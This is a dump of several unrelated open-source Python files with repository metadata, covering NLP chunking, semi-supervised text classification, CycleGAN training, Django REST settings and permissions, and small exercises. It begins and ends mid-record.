# The chunks (Up to the word)
### I overwrite these in predict()
for j in range(w_size):
x.append(padded_sentence[i + j][2])
# We represent the feature vector as a dictionary
X.append(dict(zip(feature_names, x)))
# The classes are stored in a list
y.append(padded_sentence[i + w_size][2])
return X, y
def predict(test_sentences, feature_names, f_out):
for test_sentence in test_sentences:
X_test_dict, y_test = extract_features_sent(test_sentence, w_size, feature_names)
### We need to process word by word as well
y_test_predicted = []
c1 = "BOS"
c2 = "BOS"
### Iterate over the words in the sentence
for w in X_test_dict:
### Overwrite the golden chunks from before
w["chunk_n1"] = c1
w["chunk_n2"] = c2
# Vectorize the test sentence and one hot encoding
X_test = vec.transform(w)
# Predicts the chunks and returns numbers
### Predict the chunk for this iteration
c0 = classifier.predict(X_test)
### Append to the sentence result
y_test_predicted.append(c0[0])
### Save the predicted chunk for future use
c2 = c1
c1 = c0[0]
# Appends the predicted chunks as a last column and saves the rows
rows = test_sentence.splitlines()
rows = [rows[i] + ' ' + y_test_predicted[i] for i in range(len(rows))]
for row in rows:
f_out.write(row + '\n')
f_out.write('\n')
f_out.close()
if __name__ == '__main__':
start_time = time.perf_counter()
train_corpus = './train.txt'
test_corpus = './test.txt'
w_size = 2 # The size of the context window to the left and right of the word
feature_names = ['word_n2', 'word_n1', 'word', 'word_p1', 'word_p2',
'pos_n2', 'pos_n1', 'pos', 'pos_p1', 'pos_p2',
'chunk_n2', 'chunk_n1']
train_sentences = conll_reader.read_sentences(train_corpus)
print("Extracting the features...")
X_dict, y = extract_features(train_sentences, w_size, feature_names)
print("Encoding the features...")
# Vectorize the feature matrix and carry out a one-hot encoding
vec = DictVectorizer(sparse=True)
X = vec.fit_transform(X_dict)
# The statement below will swallow a considerable memory
# X = vec.fit_transform(X_dict).toarray()
# print(vec.get_feature_names())
training_start_time = time.perf_counter()
print("Training the model...")
classifier = linear_model.LogisticRegression(penalty='l2', dual=True, solver='liblinear', multi_class='auto')
# classifier = linear_model.LogisticRegression(penalty='l2', dual=False, solver='lbfgs', multi_class='auto')
# classifier = tree.DecisionTreeClassifier()
# classifier = linear_model.Perceptron()
model = classifier.fit(X, y)
print(model)
test_start_time = time.perf_counter()
# We apply the model to the test set
test_sentences = list(conll_reader.read_sentences(test_corpus))
# Here we carry out a chunk tag prediction and we report the per tag error
# This is done for the whole corpus without regard for the sentence structure
print("Predicting the chunks in the test set...")
X_test_dict, y_test = extract_features(test_sentences, w_size, feature_names)
# Vectorize the test set and one-hot encoding
X_test = vec.transform(X_test_dict) # Possible to add: .toarray()
y_test_predicted = classifier.predict(X_test)
print("Classification report for classifier %s:\n%s\n"
% (classifier, metrics.classification_report(y_test, y_test_predicted)))
# Here we tag the test set and we save it.
# This prediction is redundant with the piece of code above,
# but we need to predict one sentence at a time to have the same
# corpus structure
print("Predicting the test set...")
f_out = open('out_ml_v2', 'w')
predict(test_sentences, feature_names, f_out)
end_time = time.perf_counter()
print("Training time:", (test_start_time - training_start_time) / 60)
print("Test time:", (end_time - test_start_time) / 60)
|
[
"ga22be@live.se"
] |
ga22be@live.se
|
4b2d79da2c70a69a5b40dc5768cc07a4be93ee7a
|
6e17016e71e6a09bf44a4286b12383bd829ed02c
|
/base-semi.py
|
2bcbfea1807fc61800257d959f55964da4581ab6
|
[] |
no_license
|
kazuyaYX/classification
|
0292c8e27844819875e4190a44d7b8f463b0de54
|
d7e54cad0bd307eb32937ced9c7a392a447dfcf3
|
refs/heads/master
| 2021-08-06T16:15:50.499733
| 2017-11-06T12:39:31
| 2017-11-06T12:39:31
| 105,126,963
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,346
|
py
|
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn import metrics
from sklearn.ensemble import GradientBoostingClassifier
import sklearn.svm as svm
from sklearn.svm import SVC
from sklearn.externals import joblib
import lda
import numpy as np
class data_20news(object):
def __init__(self):
self.train_labeled = []
self.train_labeled_target = []
self.train_unlabeled = []
self.train_unlabeled_target = []
self.train = []
self.test = []
self.test_target = []
self.target_names = []
def get_train_data(size):
twenty_train = fetch_20newsgroups(subset='train', categories=None)
twenty_test = fetch_20newsgroups(subset='test', categories=None)
balance = [size for i in range(0, 20)]
i = 0
data = data_20news()
twenty_labeled_data = []
twenty_unlabeled_data = []
twenty_train_labeled = []
twenty_train_labeled_un = []
for d in twenty_train.data:
if balance[twenty_train.target[i]] != 0:
twenty_labeled_data.append(d)
twenty_train_labeled.append(twenty_train.target[i])
balance[twenty_train.target[i]] -= 1
else:
twenty_unlabeled_data.append(d)
twenty_train_labeled_un.append(twenty_train.target[i])
i += 1
data.train_labeled = twenty_labeled_data
data.train_labeled_target = twenty_train_labeled
data.train_unlabeled = twenty_unlabeled_data
data.train_unlabeled_target = twenty_train_labeled_un
data.train = twenty_train.data
data.test = twenty_test.data
data.test_target = twenty_test.target
data.target_names = twenty_test.target_names
count = [0 for i in range(0, 20)]
for i in range(0, len(data.train_labeled)):
count[data.train_labeled_target[i]] += 1
print(count)
return data
def lda_self_training(data, n_iter, n_move, threshold):
# count_transformer = get_count_transformer(data.train)
# tfidf_transformer = get_tfidf_transformer(count_transformer)
count_vect = CountVectorizer(stop_words='english')
# count_vect.fit(data.train)
count_vect.fit(data.train)
# count_transformer = count_vect.transform(data.train)
# tfidf_transformer = TfidfTransformer().fit(count_transformer)
lda_model = joblib.load('lda100-1000.pkl')
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_lda = lda_model.transform(X_train_labeled_counts)
clf = None
for i in range(0, n_iter):
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
unlabeled_data_lda = lda_model.transform(count_vect.transform(data.train_unlabeled))
predicted = clf.predict(unlabeled_data_lda)
predicted_proba = clf.predict_proba(unlabeled_data_lda)
score_dic = {}
for j in range(0, len(predicted_proba)):
sorted_proba = sorted(predicted_proba[j], reverse=True)
score_dic[j] = sorted_proba[0] - sorted_proba[1]
score_dic = sorted(score_dic.items(), key=lambda d: d[1], reverse=True)
j = 0
balance = [n_move for k in range(0, 20)]
keys = []
for key, score in score_dic:
# print(predicted[key], score)
if j == n_move*20:
break
if balance[predicted[key]] == 0:
continue
balance[predicted[key]] -= 1
if score < threshold:
j += 1
continue
# print(predicted[key], data.train_unlabeled_target[key])
data.train_labeled.append(data.train_unlabeled[key])
# twenty_train_labeled = np.append(twenty_train_labeled, predicted[key])
data.train_labeled_target.append(predicted[key])
keys.append(key)
j += 1
keys = sorted(keys, reverse=True)
for key in keys:
# print(key, len(twenty_unlabeled_data))
del data.train_unlabeled[key]
del data.train_unlabeled_target[key]
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_lda = lda_model.transform(X_train_labeled_counts)
# print(X_train_tf.shape)
# print(len(twenty_train_labeled))
if i % 10 == 0:
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
predicted = clf.predict(lda_model.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
predicted = clf.predict(lda_model.transform(count_vect.transform(data.test)))
predicted_proba = clf.predict_proba(lda_model.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
joblib.dump(clf, 'lda-' + str(n_iter) + '-' + str(n_move) + '-' + str(threshold) + '.pkl')
return predicted_proba
def tfidf_self_training(data, n_iter, n_move, threshold):
# count_transformer = get_count_transformer(data.train)
# tfidf_transformer = get_tfidf_transformer(count_transformer)
count_vect = CountVectorizer(stop_words='english')
# count_vect.fit(data.train)
count_vect.fit(data.train)
count_transformer = count_vect.transform(data.train)
tfidf_transformer = TfidfTransformer().fit(count_transformer)
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_tfidf = tfidf_transformer.transform(X_train_labeled_counts)
clf = None
for i in range(0, n_iter):
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
unlabeled_data_tfidf = tfidf_transformer.transform(count_vect.transform(data.train_unlabeled))
predicted = clf.predict(unlabeled_data_tfidf)
predicted_proba = clf.predict_proba(unlabeled_data_tfidf)
score_dic = {}
for j in range(0, len(predicted_proba)):
sorted_proba = sorted(predicted_proba[j], reverse=True)
score_dic[j] = sorted_proba[0] - sorted_proba[1]
score_dic = sorted(score_dic.items(), key=lambda d: d[1], reverse=True)
j = 0
balance = [n_move for k in range(0, 20)]
keys = []
for key, score in score_dic:
# print(predicted[key], score)
if j == n_move*20:
break
if balance[predicted[key]] == 0:
continue
balance[predicted[key]] -= 1
if score < threshold:
j += 1
continue
# print(predicted[key], data.train_unlabeled_target[key])
data.train_labeled.append(data.train_unlabeled[key])
# twenty_train_labeled = np.append(twenty_train_labeled, predicted[key])
data.train_labeled_target.append(predicted[key])
keys.append(key)
j += 1
keys = sorted(keys, reverse=True)
for key in keys:
# print(key, len(twenty_unlabeled_data))
del data.train_unlabeled[key]
del data.train_unlabeled_target[key]
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_tfidf = tfidf_transformer.transform(X_train_labeled_counts)
# print(X_train_tf.shape)
# print(len(twenty_train_labeled))
if i % 10 == 0:
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
predicted = clf.predict(tfidf_transformer.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
predicted = clf.predict(tfidf_transformer.transform(count_vect.transform(data.test)))
predicted_proba = clf.predict_proba(tfidf_transformer.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
joblib.dump(clf, 'tfidf-' + str(n_iter) + '-' + str(n_move) + '-' + str(threshold) + '.pkl')
return predicted_proba
def base_semi(predicted_proba1, predicted_proba2, data):
predicted = []
for j in range(0, len(predicted_proba1)):
predicted_proba = []
for p in range(0, len(predicted_proba1[j])):
predicted_proba.append(predicted_proba1[j][p] + predicted_proba2[j][p])
# if j == 5:
# print(predicted_proba)
predicted.append(predicted_proba.index(max(predicted_proba)))
# print(predicted)
print("base-semi:")
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
if __name__ == '__main__':
data = get_train_data(10)
predicted_proba1 = lda_self_training(data, 201, 1, 0.01)
data = get_train_data(10)
predicted_proba2 = tfidf_self_training(data, 201, 1, 0.01)
base_semi(predicted_proba1, predicted_proba2, data)
|
[
"554810625@qq.com"
] |
554810625@qq.com
|
11d31b02a955790e7ccfb3503a14a6da2560814e
|
cfb268f6090b55b5c51c7aadba3661790c0383ac
|
/setup.py
|
26a4b33b9156f0ee10476b427cfa07a8a1dbb816
|
[
"MIT"
] |
permissive
|
theY4Kman/neoalchemy
|
1ceef03cc17815660d66bfa678f59f149923417c
|
66bf711502247a8464fd15e4256cf596c7c63de0
|
refs/heads/master
| 2016-09-06T16:14:48.406968
| 2014-12-03T22:55:03
| 2014-12-03T22:55:03
| 26,565,319
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,220
|
py
|
import os
from setuptools import setup, find_packages
current_directory = os.path.dirname(__file__)
with open(os.path.join(current_directory, 'requirements.txt')) as fp:
install_requires = fp.readlines()
with open(os.path.join(current_directory, 'test-requirements.txt')) as fp:
tests_require = fp.readlines()
setup(
name='neoalchemy',
version='0.0.1',
description='A SQLAlchemy-like object graph mapper for neo4j',
long_description=open('README.rst').read(),
author='Zach Kanzler',
author_email='they4kman@gmail.com',
zip_safe=True,
url='http://github.com/they4kman/neoalchemy',
license='MIT',
packages=find_packages(),
keywords='graph neo4j py2neo ORM',
tests_require=tests_require,
test_suite='nose.collector',
install_requires=install_requires,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Database',
])
|
[
"they4kman@gmail.com"
] |
they4kman@gmail.com
|
75cc5a62e19034865c2d1b75f42907f97aa06dc8
|
c6c4c066b5c095c1fb9c4888eec34701edabc5a9
|
/CycleGAN/cyclegan_train.py
|
b3b608f91b4010541775471786b84cfaf1ba9c70
|
[
"MIT"
] |
permissive
|
Sunshine352/Awesome-GANs
|
c24b0ae0de13e113423c8b8906e6f5076e10ab26
|
1f6e4a7d9c6a9d4e05ea142592fee2c700542009
|
refs/heads/master
| 2020-03-20T00:54:15.609319
| 2018-06-03T07:29:03
| 2018-06-03T07:29:03
| 137,060,041
| 1
| 0
| null | 2018-06-12T11:07:51
| 2018-06-12T11:07:51
| null |
UTF-8
|
Python
| false
| false
| 6,979
|
py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
import sys
import time
import cyclegan_model as cyclegan
sys.path.append('../')
import image_utils as iu
from datasets import Pix2PixDataSet as DataSet
results = {
'output': './gen_img/',
'checkpoint': './model/checkpoint',
'model': './model/CycleGAN-model.ckpt'
}
train_step = {
'epochs': 201,
'batch_size': 8,
'logging_step': 100,
}
def main():
start_time = time.time() # Clocking start
# GPU configure
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as s:
image_size = crop_size = 128
# CycleGAN Model
model = cyclegan.CycleGAN(s,
input_height=image_size,
input_width=image_size,
input_channel=3,
batch_size=train_step['batch_size'])
# Celeb-A DataSet images
data_set_name = 'vangogh2photo'
ds = DataSet(input_height=image_size,
input_width=image_size,
input_channel=3,
crop_size=crop_size,
batch_size=train_step['batch_size'],
name=data_set_name)
img_a = ds.images_a
img_b = ds.images_b
print("[*] image A shape : ", img_a.shape)
print("[*] image B shape : ", img_b.shape)
n_sample = model.sample_num
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir_a = results['output'] + 'valid_a.png'
sample_dir_b = results['output'] + 'valid_b.png'
sample_a, sample_b = img_a[:n_sample], img_b[:n_sample]
sample_a = np.reshape(sample_a, [-1] + model.image_shape[1:])
sample_b = np.reshape(sample_b, [-1] + model.image_shape[1:])
# Generated image save
iu.save_images(sample_a, [sample_image_height, sample_image_width], sample_dir_a)
iu.save_images(sample_b, [sample_image_height, sample_image_width], sample_dir_b)
print("[+] pre-processing elapsed time : {:.8f}s".format(time.time() - start_time))
# Initializing
s.run(tf.global_variables_initializer())
global_step = 0
for epoch in range(train_step['epochs']):
# learning rate decay
lr_decay = 1.
if epoch >= 100 and epoch % 10 == 0:
lr_decay = (train_step['epochs'] - epoch) / (train_step['epochs'] / 2.)
# re-implement DataIterator for multi-input
pointer = 0
num_images = min(ds.num_images_a, ds.num_images_b)
for i in range(num_images // train_step['batch_size']):
start = pointer
pointer += train_step['batch_size']
if pointer > num_images: # if ended 1 epoch
# Shuffle training DataSet
perm_a, perm_b = np.arange(ds.num_images_a), np.arange(ds.num_images_b)
np.random.shuffle(perm_a)
np.random.shuffle(perm_b)
img_a, img_b = img_a[perm_a], img_a[perm_b]
start = 0
pointer = train_step['batch_size']
end = pointer
batch_a = np.reshape(img_a[start:end], model.image_shape)
batch_b = np.reshape(img_a[start:end], model.image_shape)
for _ in range(model.n_train_critic):
s.run(model.d_op,
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
w, gp, g_loss, cycle_loss, _ = s.run([model.w, model.gp, model.g_loss, model.cycle_loss, model.g_op],
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
if global_step % train_step['logging_step'] == 0:
# Summary
summary = s.run(model.merged,
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
# Print loss
print("[+] Global Step %08d =>" % global_step,
" G loss : {:.8f}".format(g_loss),
" Cycle loss : {:.8f}".format(cycle_loss),
" w : {:.8f}".format(w),
" gp : {:.8f}".format(gp))
# Summary saver
model.writer.add_summary(summary, global_step=global_step)
# Training G model with sample image and noise
samples_a2b = s.run(model.g_a2b,
feed_dict={
model.a: sample_a,
model.b: sample_b,
model.lr_decay: lr_decay,
})
samples_b2a = s.run(model.g_b2a,
feed_dict={
model.a: sample_a,
model.b: sample_b,
model.lr_decay: lr_decay,
})
# Export image generated by model G
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir_a2b = results['output'] + 'train_a2b_{0}.png'.format(global_step)
sample_dir_b2a = results['output'] + 'train_b2a_{0}.png'.format(global_step)
# Generated image save
iu.save_images(samples_a2b, [sample_image_height, sample_image_width], sample_dir_a2b)
iu.save_images(samples_b2a, [sample_image_height, sample_image_width], sample_dir_b2a)
# Model save
model.saver.save(s, results['model'], global_step=global_step)
global_step += 1
end_time = time.time() - start_time # Clocking end
# Elapsed time
print("[+] Elapsed time {:.8f}s".format(end_time))
# Close tf.Session
s.close()
if __name__ == '__main__':
main()
|
[
"kozistr@gmail.com"
] |
kozistr@gmail.com
|
7ad2d903281abb04ba6f20108a4630a5b564596b
|
3641fd4b6e160be9da77b000935ddee5247fc601
|
/drf_spectacular/settings.py
|
2a35cc632b6470e489771e150c16eb2d78baeda8
|
[
"BSD-3-Clause"
] |
permissive
|
tiago-peres/drf-spectacular
|
02f404380bad0d63e7a47ddcd43cdb5d93a97ba3
|
244be7a61b8f5e96f05797f1e73fb651b4e6b6a0
|
refs/heads/master
| 2023-01-06T17:22:08.860293
| 2020-10-29T19:42:25
| 2020-10-29T19:45:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,754
|
py
|
from typing import Any, Dict
from django.conf import settings
from rest_framework.settings import APISettings
SPECTACULAR_DEFAULTS: Dict[str, Any] = {
# path prefix is used for tagging the discovered operations.
# use '/api/v[0-9]' for tagging apis like '/api/v1/albums' with ['albums']
'SCHEMA_PATH_PREFIX': r'',
'DEFAULT_GENERATOR_CLASS': 'drf_spectacular.generators.SchemaGenerator',
# Schema generation parameters to influence how components are constructed.
# Some schema features might not translate well to your target.
# Demultiplexing/modifying components might help alleviate those issues.
#
# Create separate components for PATCH endpoints (without required list)
'COMPONENT_SPLIT_PATCH': True,
# Split components into request and response parts where appropriate
'COMPONENT_SPLIT_REQUEST': False,
# Aid client generator targets that have trouble with read-only properties.
'COMPONENT_NO_READ_ONLY_REQUIRED': False,
# Configuration for serving the schema with SpectacularAPIView
'SERVE_URLCONF': None,
# complete public schema or a subset based on the requesting user
'SERVE_PUBLIC': True,
# is the
'SERVE_INCLUDE_SCHEMA': True,
'SERVE_PERMISSIONS': ['rest_framework.permissions.AllowAny'],
# Dictionary of configurations to pass to the SwaggerUI({ ... })
# https://swagger.io/docs/open-source-tools/swagger-ui/usage/configuration/
'SWAGGER_UI_SETTINGS': {
'deepLinking': True,
},
'SWAGGER_UI_DIST': '//unpkg.com/swagger-ui-dist@3.35.1',
'SWAGGER_UI_FAVICON_HREF': '//unpkg.com/swagger-ui-dist@3.35.1/favicon-32x32.png',
# Append OpenAPI objects to path and components in addition to the generated objects
'APPEND_PATHS': {},
'APPEND_COMPONENTS': {},
# DISCOURAGED - please don't use this anymore as it has tricky implications that
# are hard to get right. For authentication, OpenApiAuthenticationExtension are
# strongly preferred because they are more robust and easy to write.
# However if used, the list of methods is appended to every endpoint in the schema!
'SECURITY': [],
# Postprocessing functions that run at the end of schema generation.
# must satisfy interface result = hook(generator, request, public, result)
'POSTPROCESSING_HOOKS': [
'drf_spectacular.hooks.postprocess_schema_enums'
],
# Preprocessing functions that run before schema generation.
# must satisfy interface result = hook(endpoints=result) where result
# is a list of Tuples (path, path_regex, method, callback).
# Example: 'drf_spectacular.hooks.preprocess_exclude_path_format'
'PREPROCESSING_HOOKS': [],
# enum name overrides. dict with keys "YourEnum" and their choice values "field.choices"
'ENUM_NAME_OVERRIDES': {},
# function that returns a list of all classes that should be excluded from doc string extraction
'GET_LIB_DOC_EXCLUDES': 'drf_spectacular.plumbing.get_lib_doc_excludes',
# Function that returns a mocked request for view processing. For CLI usage
# original_request will be None.
# interface: request = build_mock_request(method, path, view, original_request, **kwargs)
'GET_MOCK_REQUEST': 'drf_spectacular.plumbing.build_mock_request',
# Camelize names like operationId and path parameter names
'CAMELIZE_NAMES': False,
# General schema metadata. Refer to spec for valid inputs
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.3.md#openapi-object
'TITLE': '',
'DESCRIPTION': '',
'TOS': None,
# Optional: MAY contain "name", "url", "email"
'CONTACT': {},
# Optional: MUST contain "name", MAY contain URL
'LICENSE': {},
'VERSION': '0.0.0',
# Optional list of servers.
# Each entry MUST contain "url", MAY contain "description", "variables"
'SERVERS': [],
# Tags defined in the global scope
'TAGS': [],
# Optional: MUST contain 'url', may contain "description"
'EXTERNAL_DOCS': {},
# Oauth2 related settings. used for example by django-oauth2-toolkit.
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.3.md#oauth-flows-object
'OAUTH2_FLOWS': [],
'OAUTH2_AUTHORIZATION_URL': None,
'OAUTH2_TOKEN_URL': None,
'OAUTH2_REFRESH_URL': None,
'OAUTH2_SCOPES': None,
}
IMPORT_STRINGS = [
'SCHEMA_AUTHENTICATION_CLASSES',
'DEFAULT_GENERATOR_CLASS',
'SERVE_PERMISSIONS',
'POSTPROCESSING_HOOKS',
'PREPROCESSING_HOOKS',
'GET_LIB_DOC_EXCLUDES',
'GET_MOCK_REQUEST',
]
spectacular_settings = APISettings(
user_settings=getattr(settings, 'SPECTACULAR_SETTINGS', {}),
defaults=SPECTACULAR_DEFAULTS,
import_strings=IMPORT_STRINGS,
)
|
[
"13507857+tfranzel@users.noreply.github.com"
] |
13507857+tfranzel@users.noreply.github.com
|
7221754c6507e44f0dce9224f846bc2bc2c1a474
|
217ee146317a3211622754fad14a67d9a1236dee
|
/modules/sites/__init__.py
|
69c26c39bf2b869e968f14120772d36080712b0c
|
[
"MIT"
] |
permissive
|
Swapnil074/stopstalk-deployment
|
45a5e57d278ed38f7e0f528ad751813738504439
|
ab7b988105c880d7015c9eb0ccaef7acf87de953
|
refs/heads/master
| 2022-07-20T16:24:04.690019
| 2020-05-13T05:11:45
| 2020-05-13T05:11:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
"""
Copyright (c) 2015-2020 Raj Patel(raj454raj@gmail.com), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import codechef
import codeforces
import spoj
import hackerearth
import hackerrank
import uva
import timus
|
[
"raj454raj@gmail.com"
] |
raj454raj@gmail.com
|
24f7c3e99c2b67bfcbb4983009e5367253732ee5
|
deaa2ad0981659542b7518227eaa9b716545e3cc
|
/backend/authentication/permission.py
|
78c45835d020c58dce97c61b35e1b992f4dbac9f
|
[] |
no_license
|
crabfishxy/SE-TSS
|
aec9d12eee82f06843f4f7501535ae5b9fd74f83
|
b5b0584b2332bbbd8f0e283f3b8a83cde916e9c9
|
refs/heads/master
| 2020-03-19T07:49:28.221760
| 2018-06-03T13:24:33
| 2018-06-03T13:24:33
| 136,151,755
| 0
| 0
| null | 2018-06-05T09:15:49
| 2018-06-05T09:15:49
| null |
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
from rest_framework import permissions
class RegisterCheck(permissions.BasePermission):
def has_permission(self, request, view):
type = request.user.user_type
if not type == 4:
return False
else:
return True
class StudentCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/student/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 3 or type == 4:
return True
# some info
else:
if type == 1 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 1:
if request.user.username == obj.username.username:
return True
else:
return False
else:
return True
class FacultyCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/faculty/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 3 or type == 4:
return True
# some info
else:
if type == 2 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 2:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class StaffCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/staff/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 4:
return True
# some info
else:
if type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 3:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class AdminCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/admin/"
type = request.user.user_type
path = request._request.path
# all info
if type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 4:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class CourseCheck(permissions.BasePermission):
def has_permission(self, request, view):
type = request.user.user_type
if type == 2 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
print(request)
print('1')
return True
|
[
"690764871@qq.com"
] |
690764871@qq.com
|
260de58bcf5629fc47a52af9d530ff5e2524f762
|
e7805d33d8f98a4c514373ac98db219e50df750e
|
/main.py
|
6915091de896a3e90aaa467f440c7ac7d05e6d16
|
[] |
no_license
|
MadmanSilver/my-first-neural-net
|
5265a3cabc9207509a7de5c76004ae2287303889
|
76cf1093bc0545aaf52b8b29f81828ea6092b350
|
refs/heads/main
| 2023-02-23T17:42:41.391353
| 2021-01-24T05:41:49
| 2021-01-24T05:41:49
| 311,505,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 643
|
py
|
from perset import PerSet
from random import uniform
filename = "training.txt"
max_words = 0
max_letters = 0
for line in open(filename, "r").read().split('\n'):
if len(line.split('/')[0].split()) > max_words:
max_words = len(line.split('/')[0].split())
for word in line.split('/')[0].split():
if len(word) > max_letters:
max_letters = len(word)
set1 = PerSet({l: uniform(0.0, 1.0) for l in "abcdefghijklmnopqrstuvwxyz"}, [[uniform(-4.0, 4.0) for l in range(max_letters)] for w in range(max_words)], [[uniform(-4.0, 4.0) for j in range(3)] for i in range(max_words)])
set1.train(filename)
print(set1.err)
|
[
"silverwolf4350@gmail.com"
] |
silverwolf4350@gmail.com
|
5a77f9bef1584293472acf02c7fa99e2e71c0e81
|
5e9ee05dce9287279223242a65f005a24db5e323
|
/count-lines.py
|
d63c45cf4e6776f0b7c386c123ed7ff30e2777fe
|
[] |
no_license
|
LeslieMooyaart/patients-analysis
|
205e4ffe4284456451a1dac10f07da640c616d68
|
b726f1cd8baf31b2fc2b8f2a29a98b7cf566dad4
|
refs/heads/master
| 2023-06-02T19:38:24.201862
| 2021-06-22T14:20:38
| 2021-06-22T14:20:38
| 379,275,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
import sys
"""Adding documentation locally
Adding documentation remotely"""
count = 0
for line in sys.stdin:
count += 1
print(count, 'lines in standard input')
|
[
"l.f.mooyaart@tudelft.nl"
] |
l.f.mooyaart@tudelft.nl
|
dee0dd4897a3885c08bea8fc4eee4f83b31eee8e
|
4373488e0a2a34734fc6f6ffc7729e353c25fdfa
|
/exception_example.py
|
c8c84f10f12115c0d8ac3fae1e3a5599656d3436
|
[] |
no_license
|
dmc200/Python-Projects
|
9a141b28004c913f7ec3714cbbdb7a9ed8952922
|
bcba096183d56fcbcc6f5869bd6ac32b87ce3720
|
refs/heads/master
| 2021-06-17T10:05:05.711876
| 2019-10-25T18:19:46
| 2019-10-25T18:19:46
| 202,403,008
| 0
| 0
| null | 2021-06-10T22:09:39
| 2019-08-14T18:16:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 855
|
py
|
'''
def div42by(divideBy):
return 42 /divideBy
try:
print(div42by(1))
print(div42by(1))
print(div42by(0))
print(div42by(1))
except ZeroDivisionError:
print("You have tried to divide by 0")
finally:
print("This is finally done")
'''
play = True
while play:
print("How many cats do you have?")
numCats = input()
try:
if int(numCats) >= 4:
print("Wow that is a lot of cats!")
elif int(numCats) < 0:
myError = ValueError('# of cats should be a positive number')
raise myError
else:
print("Not that many cats")
break
except ValueError:
print("Not in integer, try again")
play = input("Again?").lower()
if play == 'y':
play = True
else:
play = False
|
[
"dean.chirieleison@outlook.com"
] |
dean.chirieleison@outlook.com
|
2c0dbf6acab109eb25c2d20033d8b05a692120fd
|
bd4955a474ec94f1d240641a303916f25e149333
|
/new/csvproject/csvproject/asgi.py
|
04124c3447788b1601a3e56798f390b794e260df
|
[] |
no_license
|
pranavsharma707/csvproject
|
8d8de7c84fef211f99d06fffc65d5b59cdae164e
|
bc22cfcade2acba690328e185f545dc64045dce7
|
refs/heads/master
| 2023-07-14T14:31:59.607320
| 2021-08-25T13:19:58
